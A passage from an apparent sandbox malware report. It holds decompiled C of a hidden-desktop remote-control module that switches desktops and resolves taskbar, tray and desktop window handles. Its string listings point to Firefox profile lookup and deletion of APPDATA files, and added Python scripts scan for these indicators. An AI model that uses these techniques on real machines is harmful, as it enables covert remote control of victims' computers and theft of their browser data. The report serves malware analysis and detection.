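                    r'"C:\Users\victim\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release"',
     "ParentImage": r"C:\Windows\explorer.exe"},                        # legitimate -profile use
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

A single -profile argument is not malicious on its own (profile managers and test setups use it), which is why the rule reports each reason separately and lets the analyst weigh the combination; the temp-directory location plus -no-remote plus a non-shell parent is the pattern that corresponds to what this function's strings describe.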

                                          C-Code - Quality: 23%
                                          			E00C687CC(void* __esi, void* __ebp, signed long long __rax, signed long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r14) {
                                          				void* __rbp;
                                          				signed long long _t36;
                                          				signed long long _t47;
                                          				long _t60;
                                          				void* _t61;
                                          				void* _t81;
                                          				signed long long _t83;
                                          				signed long long _t88;
                                          				signed long long _t89;
                                          				signed long long _t90;
                                          				signed long long _t91;
                                          				void* _t115;
                                          				signed long long _t123;
                                          				long long _t125;
                                          				void* _t129;
                                          				void* _t130;
                                          				void* _t131;
                                          				void* _t133;
                                          				void* _t134;
                                          				long long _t141;
                                          
                                          				_t141 = __r14;
                                          				_t134 = __r8;
                                          				_t91 = __rbx;
                                          				_t88 = __rax;
                                          				_t131 = _t130 - 0x30;
                                          				_t129 = _t131 + 0x30;
                                          				 *((long long*)(_t129 + 0x10)) = __rbx;
                                          				 *((long long*)(_t129 + 0x18)) = __rsi;
                                          				 *((long long*)(_t129 + 0x20)) = __rdi;
                                          				 *((long long*)(_t129 + 0x28)) = __r14;
                                          				r14d = 0;
                                          				GetCurrentThreadId();
                                          				GetThreadDesktop(??);
                                          				_t123 = __rax;
                                          				E00C6ADF0();
                                          				GetModuleHandleA(??);
                                          				GetProcAddress(??, ??);
                                          				 *0xc95870 = __rax;
                                          				_t127 = 0xc95710;
                                          				if(__rax != 0) {
                                          					r9d = 0;
                                          					r8d = 0;
                                          					_t36 = E00C788A0(__rax, __rbx, 0xc95710);
                                          					_t83 = _t36;
                                          					__eflags = _t36;
                                          					if(_t36 != 0) {
                                          						L23:
                                          						__eflags = _t83 - 2;
                                          						if(_t83 == 2) {
                                          							goto L31;
                                          						}
                                          						__eflags = _t91;
                                          						if(_t91 != 0) {
                                          							_t23 = _t91 + 0x88; // 0x88
                                          							E00C7E3D4(_t88, _t91, _t23, _t127, _t129);
                                          							__eflags =  *((intOrPtr*)(_t91 + 0x10));
                                          							if( *((intOrPtr*)(_t91 + 0x10)) != 0) {
                                          								CloseHandle();
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t91 + 0x768));
                                          							if( *((intOrPtr*)(_t91 + 0x768)) != 0) {
                                          								CloseHandle();
                                          								 *((long long*)(_t91 + 0x768)) = _t141;
                                          							}
                                          							__eflags = 0;
                                          							HeapFree(??, ??, ??);
                                          						}
                                          						goto L30;
                                          					}
                                          					SetErrorMode();
                                          					E00C68B38(__rax);
                                          					r8d = 0x878;
                                          					HeapAlloc(??, ??, ??);
                                          					_t91 = __rax;
                                          					__eflags = __rax;
                                          					if(__rax == 0) {
                                          						goto L31;
                                          					}
                                          					r8d = 0x778;
                                          					L00C6A50A();
                                          					r8d = 0;
                                          					CreateMutexA(??, ??, ??);
                                          					 *((long long*)(__rax + 0x10)) = __rax;
                                          					__eflags = __rax;
                                          					if(__eflags == 0) {
                                          						goto L31;
                                          					}
                                          					_t8 = _t91 + 0x88; // 0x88
                                          					_t47 = E00C7E238(0, __eflags, __rax, _t8, 0xc95710, 0xc95710, _t129, _t134, __r10);
                                          					_t83 = _t47;
                                          					__eflags = _t47;
                                          					if(_t47 != 0) {
                                          						goto L23;
                                          					}
                                          					asm("movaps xmm0, [0x2ce3f]");
                                          					_t136 = E00C68C8C;
                                          					asm("movups [ebx+0x18], xmm0");
                                          					 *((long long*)(_t131 + 0x28)) = __r14;
                                          					asm("movaps xmm1, [0x2ce35]");
                                          					_t81 = 0;
                                          					asm("movups [ebx+0x28], xmm1");
                                          					 *((intOrPtr*)(_t131 + 0x20)) = r14d;
                                          					asm("movaps xmm0, [0x2ce31]");
                                          					asm("movups [ebx+0x38], xmm0");
                                          					asm("movaps xmm1, [0x2ce36]");
                                          					asm("movups [ebx+0x48], xmm1");
                                          					asm("movaps xmm0, [0x2ce3b]");
                                          					asm("movups [ebx+0x58], xmm0");
                                          					CreateThread(??, ??, ??, ??, ??, ??);
                                          					CloseHandle(??);
                                          					_t89 =  *0xc95730; // 0x0
                                          					__eflags = _t89;
                                          					if(_t89 == 0) {
                                          						L13:
                                          						_t127 =  *0xc95690; // 0x20dcd802040
                                          						__eflags = _t127;
                                          						if(_t127 != 0) {
                                          							lstrlenA();
                                          							r8d = _t123 + _t89;
                                          							_t115 = _t136 + _t136;
                                          							_t90 = _t115 + 0xf;
                                          							__eflags = _t90 - _t115;
                                          							if(_t90 <= _t115) {
                                          								_t90 = 0xfffffff0;
                                          							}
                                          							_t89 = _t90 & 0xfffffff0;
                                          							E00C6A4A0();
                                          							_t133 = _t131 - _t89;
                                          							r9d = r9d | 0xffffffff;
                                          							_t81 = 0;
                                          							__eflags = 0;
                                          							 *((intOrPtr*)(_t133 + 0x28)) = r8d;
                                          							_t125 = _t133 + 0x30;
                                          							_t136 = _t127;
                                          							 *_t125 = r14w;
                                          							 *((long long*)(_t133 + 0x20)) = _t125;
                                          							MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                          						} else {
                                          							_t125 = _t141;
                                          						}
                                          						r8d =  *0xc9567c; // 0x6beb0604
                                          						_t107 = _t91;
                                          						E00C7A184(_t81, _t89, _t91, _t91, _t125, _t125, _t127, _t136);
                                          						L19:
                                          						r8d = 0;
                                          						E00C7B940(_t89, _t91, _t107, "Shell_TrayWnd", _t127, _t129, _t136);
                                          						r8d = 0;
                                          						 *(_t91 + 0xe8) = _t89;
                                          						E00C7B940(_t89, _t91, _t107, "NotifyIconOverflowWindow", _t127, _t129, _t136);
                                          						 *(_t91 + 0x130) = _t89;
                                          						 *0xc95760 = _t91;
                                          						_t83 = r14d;
                                          						GetModuleHandleA(??);
                                          						__eflags = _t89;
                                          						if(_t89 != 0) {
                                          							GetProcAddress();
                                          							__eflags = _t89;
                                          							if(_t89 != 0) {
                                          								__eflags = 0;
                                          								 *_t89();
                                          							}
                                          						}
                                          						E00C7D4E4();
                                          						E00C6A0EC();
                                          						goto L31;
                                          					} else {
                                          						goto L7;
                                          					}
                                          					while(1) {
                                          						L7:
                                          						__eflags =  *((intOrPtr*)(_t89 + 0x16c)) - r14d;
                                          						if( *((intOrPtr*)(_t89 + 0x16c)) != r14d) {
                                          							break;
                                          						}
                                          						Sleep();
                                          						_t89 =  *0xc95730; // 0x0
                                          						__eflags = _t89;
                                          						if(_t89 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					__eflags = _t89;
                                          					if(_t89 == 0) {
                                          						goto L13;
                                          					}
                                          					_t60 = GetCurrentProcessId();
                                          					_t107 =  *0xc95730; // 0x0
                                          					__eflags =  *((intOrPtr*)(_t107 + 0x16c)) - _t60;
                                          					if( *((intOrPtr*)(_t107 + 0x16c)) != _t60) {
                                          						goto L13;
                                          					} else {
                                          						 *0xc95768 = 1;
                                          						_t61 = E00C6ADD8();
                                          						__eflags = _t61 - 5;
                                          						if(_t61 > 5) {
                                          							FindWindowExA();
                                          							r8d = 0;
                                          							E00C7B940(_t89, _t91, _t89, "SHELLDLL_DefView", _t127, _t129, "Progman");
                                          							_t136 = "FolderView";
                                          							 *(_t91 + 0x118) = _t89;
                                          							_t107 = _t89;
                                          							E00C7B940(_t89, _t91, _t89, "SysListView32", _t127, _t129, "FolderView");
                                          							 *(_t91 + 0x110) = _t89;
                                          						}
                                          						goto L19;
                                          					}
                                          				} else {
                                          					_t6 = _t88 + 0x7f; // 0x7f
                                          					_t83 = _t6;
                                          					L30:
                                          					E00C78C54(_t127);
                                          					L31:
                                          					return _t83;
                                          				}
                                          			}

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00C687ED
                                          • GetThreadDesktop.USER32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C687F5
                                            • Part of subcall function 00C6ADF0: GetVersionExA.KERNEL32 ref: 00C6AE04
                                          • GetModuleHandleA.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6880A
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6881A
                                          • SetErrorMode.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6885B
                                          • HeapAlloc.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68875
                                          • CreateMutexA.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6889E
                                          • CreateThread.KERNEL32 ref: 00C68919
                                          • CloseHandle.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68922
                                          • Sleep.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68948
                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6895F
                                          • FindWindowExA.USER32 ref: 00C6899A
                                            • Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
                                            • Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
                                            • Part of subcall function 00C78C54: FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$Thread$CreateCurrentFileFindUnmapView$AddressAllocChangeDesktopErrorHeapModeModuleMutexNotificationProcProcessSleepVersionWindow
                                          • String ID: FolderView$MessageBoxTimeoutA$NotifyIconOverflowWindow$Progman$Program Manager$SHELLDLL_DefView$SetThemeAppProperties$Shell_TrayWnd$SysListView32$UxTheme.dll$user32
                                          • API String ID: 3205392655-3649642972
                                          • Opcode ID: 2d7404ebe289a6869ae120fcd7dcbb8a7ef8e346a3e692494fa0a0c0e4aab62a
                                          • Instruction ID: fc222db638b2235cbc793446f7f5cf246f989ab832e65b79f0254cef194d3ee7
                                          • Opcode Fuzzy Hash: 2d7404ebe289a6869ae120fcd7dcbb8a7ef8e346a3e692494fa0a0c0e4aab62a
                                          • Instruction Fuzzy Hash: D791AF31211B4082FB25DF71E8947AD23A1FB88B94F889726DE5E17B65EF38C249C304
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$Item$State$HiliteKeyboard$ActivateAncestorCountFromLayoutMessagePointPopupPostRectRedrawTrackWindow
                                          • String ID: open$taskmgr
                                          • API String ID: 3076619497-1543563666
                                          • Opcode ID: 9203e76cc7e01bb814064e46f6d428a048f7416013aae1f4f21e6c48c32a11ae
                                          • Instruction ID: ad495c53ecd6e429f8f97906940b1a0fe9767e68da41c1dc5d4d54f3cb4e6dc2
                                          • Opcode Fuzzy Hash: 9203e76cc7e01bb814064e46f6d428a048f7416013aae1f4f21e6c48c32a11ae
                                          • Instruction Fuzzy Hash: F3C1B171205A4086FB348F25E984BAE7764F789B84F448227DE5A47F68EF3CC64AC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E00C7DED4(void* __esi, void* __ebp, long long __rbx, char* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				int _t58;
                                          				signed int _t63;
                                          				signed int _t64;
                                          				signed int _t65;
                                          				int _t102;
                                          				signed int _t105;
                                          				void* _t107;
                                          				void* _t109;
                                          				void* _t115;
                                          				char* _t117;
                                          				char* _t149;
                                          				long long _t162;
                                          				void* _t165;
                                          				long _t172;
                                          				long long _t174;
                                          
                                          				_t165 = __r8;
                                          				_t160 = __rbp;
                                          				_t155 = __rdi;
                                          				_t117 = __rcx;
                                          				_t112 = _t162;
                                          				 *((long long*)(_t112 + 8)) = __rbx;
                                          				 *((long long*)(_t112 + 0x10)) = __rbp;
                                          				 *((long long*)(_t112 + 0x18)) = __rsi;
                                          				 *((long long*)(_t112 + 0x20)) = __rdi;
                                          				_t158 = __rcx;
                                          				_t5 = _t117 + 0x88; // 0x88
                                          				_t115 = _t5;
                                          				GetVersion();
                                          				 *((intOrPtr*)(_t115 + 8)) = GetCurrentThreadId();
                                          				GetThreadDesktop(_t172);
                                          				 *((long long*)(_t115 + 0x10)) = _t112;
                                          				if(SetThreadDesktop(??) != 0) {
                                          					_t58 = RegisterWindowMessageA();
                                          					_t102 = _t58;
                                          					if(_t58 == 0) {
                                          						goto L1;
                                          					} else {
                                          						 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)) + 0x154)) =  *((intOrPtr*)(_t115 + 0x30));
                                          						 *( *((intOrPtr*)(__rcx + 0x38)) + 0x150) = _t102;
                                          						_t112 =  *((intOrPtr*)(__rcx + 0x38));
                                          						 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)) + 0x164)) = 1;
                                          						_t63 = E00C7D99C( *((intOrPtr*)(__rcx + 0x38)), _t115, _t115, __rcx, __rbp, __r9);
                                          						_t105 = _t63;
                                          						if(_t63 != 0) {
                                          							goto L30;
                                          						} else {
                                          							_t64 = E00C7DE00(_t115, __rcx, __rdi, __rcx);
                                          							_t105 = _t64;
                                          							if(_t64 != 0) {
                                          								goto L30;
                                          							} else {
                                          								_t65 = E00C7E5CC(_t115, _t115, _t155, __rcx);
                                          								_t105 = _t65;
                                          								if(_t65 != 0) {
                                          									goto L30;
                                          								} else {
                                          									_t125 =  *((intOrPtr*)(_t158 + 0x38));
                                          									_t109 = 0;
                                          									 *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x38)) + 0x16c)) =  *((intOrPtr*)(_t115 + 0x28));
                                          									while(1) {
                                          										_t112 =  *((intOrPtr*)(_t158 + 0x38));
                                          										_t174 =  *((intOrPtr*)(_t112 + 0x130));
                                          										if(_t174 != 0) {
                                          											break;
                                          										}
                                          										Sleep();
                                          										_t109 = _t109 + 1;
                                          										if(_t109 < 0xc8) {
                                          											continue;
                                          										} else {
                                          											_t105 = _t105 | 0xffffffff;
                                          											goto L30;
                                          										}
                                          										goto L31;
                                          									}
                                          									GetDesktopWindow();
                                          									_t107 = 0;
                                          									 *((long long*)(_t115 + 0x58)) = _t174;
                                          									 *((long long*)(_t115 + 0x50)) = _t112;
                                          									if( *((intOrPtr*)(_t115 + 0x60)) == _t158) {
                                          										while(_t107 < 0xa) {
                                          											r8d = 0;
                                          											E00C7B940(_t112, _t115, _t125, "Shell_TrayWnd", _t158, _t160, _t165);
                                          											 *((long long*)(_t115 + 0x60)) = _t112;
                                          											if(_t112 == 0) {
                                          												Sleep();
                                          											}
                                          											_t107 = _t107 + 1;
                                          											if( *((long long*)(_t115 + 0x60)) == 0) {
                                          												continue;
                                          											}
                                          											goto L15;
                                          										}
                                          									}
                                          									L15:
                                          									r8d = 0;
                                          									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x60)), "ReBarWindow32", _t158, _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x70)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, "MSTaskSwWClass", _t158, _t160, _t165);
                                          									_t158 = "ToolbarWindow32";
                                          									 *((long long*)(_t115 + 0x68)) = _t112;
                                          									r8d = 0;
                                          									E00C7B940(_t112, _t115, _t112, "ToolbarWindow32", "ToolbarWindow32", _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x78)) = _t112;
                                          									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x68)), "MSTaskListWClass", "ToolbarWindow32", _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x80)) = _t112;
                                          									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x60)), "TrayNotifyWnd", "ToolbarWindow32", _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x98)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0xc0)) = _t112;
                                          									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x98)), "SysPager", _t158, _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0xa0)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0xb0)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, "NotifyIconOverflowWindow", _t158, _t160, _t165);
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0xa8)) = _t112;
                                          									_t134 = _t112;
                                          									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
                                          									 *((long long*)(_t115 + 0xb8)) = _t112;
                                          									if(E00C6ADD8() > 5) {
                                          										if(E00C6ADD8() != 6 || E00C6ADE0() != 0) {
                                          											if(E00C6ADD8() != 6 || E00C6ADE0() != 1) {
                                          												if(E00C6ADD8() > 6 || E00C6ADD8() == 6 && E00C6ADE0() > 1) {
                                          													_t134 =  *((intOrPtr*)(_t115 + 0x60));
                                          													_t149 = "Start";
                                          													goto L26;
                                          												}
                                          											} else {
                                          												goto L21;
                                          											}
                                          										} else {
                                          											L21:
                                          											_t149 = "Button";
                                          											L26:
                                          											E00C7B940(_t112, _t115, _t134, _t149, _t158, _t160, "Start");
                                          											goto L27;
                                          										}
                                          									} else {
                                          										_t134 =  *((intOrPtr*)(_t115 + 0x60));
                                          										GetWindow(??, ??);
                                          										L27:
                                          										 *((long long*)(_t115 + 0x40)) = _t112;
                                          									}
                                          									E00C7B940(_t112, _t115, _t134, "DV2ControlHost", _t158, _t160, "Start menu");
                                          									 *((long long*)(_t115 + 0x48)) = _t112;
                                          									E00C7B940(_t112, _t115, _t134, "Progman", _t158, _t160, "Program Manager");
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x38)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, "SHELLDLL_DefView", _t158, _t160, "Program Manager");
                                          									 *((long long*)(_t115 + 0x90)) = _t112;
                                          									E00C7B940(_t112, _t115, _t112, "SysListView32", _t158, _t160, "FolderView");
                                          									r8d = 0;
                                          									 *((long long*)(_t115 + 0x88)) = _t112;
                                          									SendMessageA(??, ??, ??, ??);
                                          									goto L29;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					L1:
                                          					_t105 = GetLastError();
                                          					L29:
                                          					if(_t105 != 0) {
                                          						L30:
                                          						E00C7E3D4(_t112, _t115, _t115, _t158, _t160);
                                          					}
                                          				}
                                          				L31:
                                          				return _t105;
                                          			}

                                          Address range of the listing above: 0x00c7ded4 to 0x00c7e236 (the per-line address gutter did not survive extraction)


                                          APIs
                                          • GetVersion.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DEF7
                                          • GetCurrentThreadId.KERNEL32 ref: 00C7DEFD
                                          • GetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF08
                                          • SetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF15
                                          • GetLastError.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF1F
                                          • RegisterWindowMessageA.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF33
                                          • Sleep.KERNEL32 ref: 00C7DFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$Desktop$CurrentErrorLastMessageRegisterSleepVersionWindow
                                          • String ID: Button$DV2ControlHost$FolderView$MSTaskListWClass$MSTaskSwWClass$NotifyIconOverflowWindow$Progman$Program Manager$ReBarWindow32$SHELLDLL_DefView$Shell_TrayWnd$Start$Start menu$SysListView32$SysPager$ToolbarWindow32$TrayNotifyWnd$VisualEffects
                                          • API String ID: 3572586140-3030675435
                                          • Opcode ID: d61ba950d70bb93267557f5b4cbba4dfd0d860f9a03f3fb5fe1ec5f43cbb9291
                                          • Instruction ID: 41d6122436df8a66f7875c229a56215bcce2c501c4e2a15b3f43f46fae0dd045
                                          • Opcode Fuzzy Hash: d61ba950d70bb93267557f5b4cbba4dfd0d860f9a03f3fb5fe1ec5f43cbb9291
                                          • Instruction Fuzzy Hash: 0F91C132200B4582EB60EF75E851B6E33B4FB49B94F84D226DA5E87B25EF34C905D740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

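The listing above is what a hidden-desktop remote-control module needs before it can drive the shell: it calls GetThreadDesktop/SetThreadDesktop, registers a private window message, spins up to 0xc8 iterations on Sleep() waiting for a field at offset 0x130 to become non-zero, and then resolves the shell window tree by class name (Shell_TrayWnd, then ReBarWindow32, MSTaskSwWClass and ToolbarWindow32 for the task band; TrayNotifyWnd, SysPager and ToolbarWindow32 for the tray; NotifyIconOverflowWindow; Progman, SHELLDLL_DefView and SysListView32 "FolderView" for the desktop icons). The Start button lookup is version dependent: E00C6ADD8/E00C6ADE0 appear to be major/minor accessors for the GetVersion result, so Vista and 7 get class "Button" with caption "Start", Windows 8 and later get class "Start", and anything older falls back to GetWindow. The triage check below is an added example, not code from the report or from the sample: it scans a raw buffer (PE file or memory dump) for that class-name set together with the desktop-switching imports and reports which indicators co-occur. The indicator grouping, the MIN_CLASSES threshold, the scan() and build_*_sample() names, and the constructed sample buffers are this example's own assumptions.

```python
"""Triage check for the hidden-desktop shell-walking pattern.

Added example, not part of the sandbox report or of the sample. Scans a raw
buffer (PE file or memory dump) for the window-class strings the listing
resolves and for the desktop-switching APIs it calls, and reports which
indicators co-occur. Thresholds and grouping are this example's assumptions.
"""
from typing import Dict, List

# Window classes resolved by the listing (taken from the report's String ID line).
SHELL_CLASSES: List[bytes] = [
    b"Shell_TrayWnd", b"ReBarWindow32", b"MSTaskSwWClass", b"ToolbarWindow32",
    b"MSTaskListWClass", b"TrayNotifyWnd", b"SysPager",
    b"NotifyIconOverflowWindow", b"DV2ControlHost", b"Progman",
    b"SHELLDLL_DefView", b"SysListView32",
]

# APIs the listing calls (taken from the report's APIs section).
DESKTOP_APIS: List[bytes] = [
    b"GetThreadDesktop", b"SetThreadDesktop", b"RegisterWindowMessageA",
    b"GetDesktopWindow",
]

# Assumption: an ordinary shell or accessibility tool touches one or two of
# these classes; requiring most of the set plus a desktop switch keeps it out.
MIN_CLASSES = 8


def _present(buf: bytes, needle: bytes) -> bool:
    """True if needle occurs as ASCII or as UTF-16LE (import names are ASCII,
    class names in wide-string builds are UTF-16LE)."""
    wide = needle.decode("ascii").encode("utf-16-le")
    return needle in buf or wide in buf


def scan(buf: bytes) -> Dict[str, object]:
    """Return the matched indicators and a verdict for one buffer."""
    classes = [n.decode() for n in SHELL_CLASSES if _present(buf, n)]
    apis = [n.decode() for n in DESKTOP_APIS if _present(buf, n)]
    switches_desktop = "GetThreadDesktop" in apis and "SetThreadDesktop" in apis
    return {
        "classes": classes,
        "apis": apis,
        "switches_desktop": switches_desktop,
        "suspicious": len(classes) >= MIN_CLASSES and switches_desktop,
    }


def build_constructed_sample() -> bytes:
    """Constructed stand-in for a dumped image: the report's strings embedded
    in filler. These are not bytes from the real sample."""
    filler = b"\x00" * 16
    parts = [b"MZ", filler]
    extra = [b"Start menu", b"Program Manager", b"FolderView"]
    for s in SHELL_CLASSES + DESKTOP_APIS + extra:
        parts.append(s + b"\x00" + filler)
    return b"".join(parts)


def build_benign_sample() -> bytes:
    """Constructed stand-in for a tool that only locates the taskbar."""
    return b"MZ" + b"\x00" * 16 + b"Shell_TrayWnd\x00FindWindowA\x00GetDesktopWindow\x00"


if __name__ == "__main__":
    for name, buf in (("constructed", build_constructed_sample()),
                      ("benign", build_benign_sample())):
        r = scan(buf)
        print(f"{name}: suspicious={r['suspicious']} classes={len(r['classes'])} apis={r['apis']}")
```

Run it against a dumped module with `scan(open(path, "rb").read())`; the returned dict lists exactly which classes and imports were seen, so a hit can be tied back to the String ID and APIs lines of the report rather than to a single fuzzy hash.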
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocErrorLastlstrcpy$CreateFileFreelstrcatlstrlen
                                          • String ID: Default=1$IsRelative=1$Path=$Profiles\Default$[Profile$\profiles.ini
                                          • API String ID: 732051534-3061325931
                                          • Opcode ID: 0acd494f8dac8503174c5e554d38c4eb6b97113f5b6dcbfd90fd0e27c0ffac4f
                                          • Instruction ID: 554bc38d74270b9c88b41ee638dbfce99d31b7844f201f192e4b138fdc8e159d
                                          • Opcode Fuzzy Hash: 0acd494f8dac8503174c5e554d38c4eb6b97113f5b6dcbfd90fd0e27c0ffac4f
                                          • Instruction Fuzzy Hash: 5271BD71304F8186FB259F12E858B6A77A0F785FA4F90C225DE5A43B64EF38C949DB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$FileFindmemset$lstrcmplstrlen$AllocCloseDeleteDirectoryFirstHeapNextRemove
                                          • String ID: APPDATA
                                          • API String ID: 3722983715-4054820676
                                          • Opcode ID: 3fc75f5bd2c91e8a3378cc6400bdff6dc861c94856ddef82e46a99bd0fd89bf9
                                          • Instruction ID: 702ce0417040c0dd50a0a2b93f22c54ada0ea28d9141830a43ecc4effbea0420
                                          • Opcode Fuzzy Hash: 3fc75f5bd2c91e8a3378cc6400bdff6dc861c94856ddef82e46a99bd0fd89bf9
                                          • Instruction Fuzzy Hash: C6514765300A4182FA249F26FC987696361BB89FE5F84D229DD5B07AA4DF3CC50AC704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$HandleProcessQuery$AllocCloseCurrentDuplicateInformationObjectSystemlstrlen
                                          • String ID: File
                                          • API String ID: 2333355087-749574446
                                          • Opcode ID: 7e8f9e3fdc403fc15fd581c76d1a16a9ad3c1adb65e1c94705dd3fa945da94a0
